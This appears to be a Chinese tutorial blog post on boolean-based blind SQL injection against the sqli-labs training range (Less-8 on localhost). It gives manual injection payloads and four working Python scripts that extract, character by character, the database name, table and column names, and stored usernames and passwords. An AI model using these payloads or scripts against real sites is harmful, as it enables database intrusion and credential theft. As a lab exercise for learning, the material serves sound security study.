Sqli-labs-master靶场--布尔盲注

目录

1、布尔盲注

2、布尔盲注的流程(以靶场less-8为例)

2.1输入id尝试是否存在注入点

2.1.1通过以上尝试,联想到可能是布尔盲注

2.2猜测数据库长度

2.3获取数据库名

2.3.1python脚本获取

代码:

获取结果为:

2.4获取表名

[2.4.1count() 函数获取表名长度](#2.4.1count() 函数获取表名长度)

2.4.2获取表名

代码:

结果:

2.5获取字段名

代码:

结果:

获取数据:


1、布尔盲注

布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,布尔盲注通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;或者为真时返回正常页面,为假时跳转到错误页面等。不需要返回结果,仅判断语句是否正常执行。

2、布尔盲注的流程(以靶场less-8为例)

2.1输入id尝试是否存在注入点

输入?id=1后,显示为下图

输入?id=1' 后,显示与上方不同,存在注入点

判断一下字段数:?id=1' order by 3 --+,显示You are in...

尝试显示报错位:?id=1' union select 1,2,3 --+,仍然为You are in...

2.1.1通过以上尝试,联想到可能是布尔盲注

2.2猜测数据库长度

确定数据库长度为8。

2.3获取数据库名

通过截取字符串的方式。函数substr(string, start, length) 截取字符串,这个函数用来截取一个字符串从'start'位,可以是第1位、第2位、第3位,以此类推。每次截取'length'个字符。然后使用ascii()函数。其作用是将字符转换成对应的ascii值。

python 复制代码
?id=1' and ascii(substr(database(),1,1))=97--+

如上图所示,如果数据库名的第一个字符的ascii码值等于97,则页面显示正确的页面,如果数据库名的第一个字符的ascii码值不等于97,则页面显示错误的页面,可以通过这种方式获取到数据库名,但效率过于低下,所以我们使用脚本来获取数据库名。

2.3.1python脚本获取

使用下列代码就可以获取到数据库名

代码:
python 复制代码
import time
 
import requests
 
url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'
 
def inject_database(url):
    name = ''
    for i in range(1, 20):
        for j in range(32, 129):
            payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:
                name = name + chr(j)
                print(name)
                break
            else:
                continue
 
inject_database(url)
获取结果为:

2.4获取表名

2.4.1count() 函数获取表名长度

python 复制代码
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1)))=101 --+

由上图可见,看出security下有四张表

2.4.2获取表名

利用下面的python脚本就可以获取到所有的表名

代码:
python 复制代码
import requests
 
url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'
 
 
def boolean_blind_inject(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))> %d-- " %(i, mid)
            params = {'id': payload} 
 
            # 发送 GET 请求
            r = requests.get(url, params=params)
 
         
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
 
        if mid == 32:  
            break
        name += chr(mid)
        print(name)

boolean_blind_inject(url)
结果:

2.5获取字段名

利用表名可以获取到用户的账户和密码在users表中,使用上面python脚本来获取字段名,需要将刚才的python脚本中payload的内容换一下。

代码:
python 复制代码
import requests
 
url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'
 
 
def boolean_blind_inject(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))> %d-- " %(i, mid)
            params = {'id': payload}  # 使用 params 而不是 data
 
            # 发送 GET 请求
            r = requests.get(url, params=params)
 
            # 根据页面内容或状态码判断是否注入成功
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
 
        if mid == 32:  # 如果 mid 为 32,则表示已经到达字符串的末尾
            break
        name += chr(mid)
        print(name)
 
# 调用函数
boolean_blind_inject(url)
结果:

获取数据:

python 复制代码
import requests
 
url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'
 
 
def boolean_blind_inject(url):
    name = ''
    for i in range(1, 200):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(username,id,password) from users),%d,1))> %d-- " %(i, mid)
            params = {'id': payload}  # 使用 params 而不是 data
 
            # 发送 GET 请求
            r = requests.get(url, params=params)
 
            # 根据页面内容或状态码判断是否注入成功
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
 
        if mid == 32:  # 如果 mid 为 32,则表示已经到达字符串的末尾
            break
        name += chr(mid)
        print(name)
 
# 调用函数
boolean_blind_inject(url)

ok,完成。

相关推荐
APItesterCris24 分钟前
构建弹性数据管道:利用淘宝商品 API 进行流式数据采集与处理
linux·数据库·windows
九河云30 分钟前
TOS + 数字孪生:集装箱码头的智能进化密码
大数据·服务器·网络·数据库·数字化转型
手握风云-1 小时前
MySQL数据库精研之旅第十九期:存储过程,数据处理的全能工具箱(二)
数据库·mysql
孟意昶1 小时前
Doris专题17- 数据导入-文件格式
大数据·数据库·分布式·sql·doris
你可以永远相信功夫熊猫1 小时前
金蝶云·星瀚 | 生产制造成本核算终极实操手册(从0到1,含两套完整案例)
数据库·erp
Thepatterraining1 小时前
MySQL零基础教程:DDL/DCL/DML详解,从建库到存储过程一篇搞定!
数据库·sql·mysql
想ai抽1 小时前
深入starrocks-怎样实现多列联合统计信息
java·数据库·数据仓库
Y4090012 小时前
MySQL中的“事务”
数据库·mysql
Raymond运维2 小时前
MySQL源码编译安装
linux·数据库·mysql
清风细雨_林木木2 小时前
MacOS本地数据库搭建
数据库·macos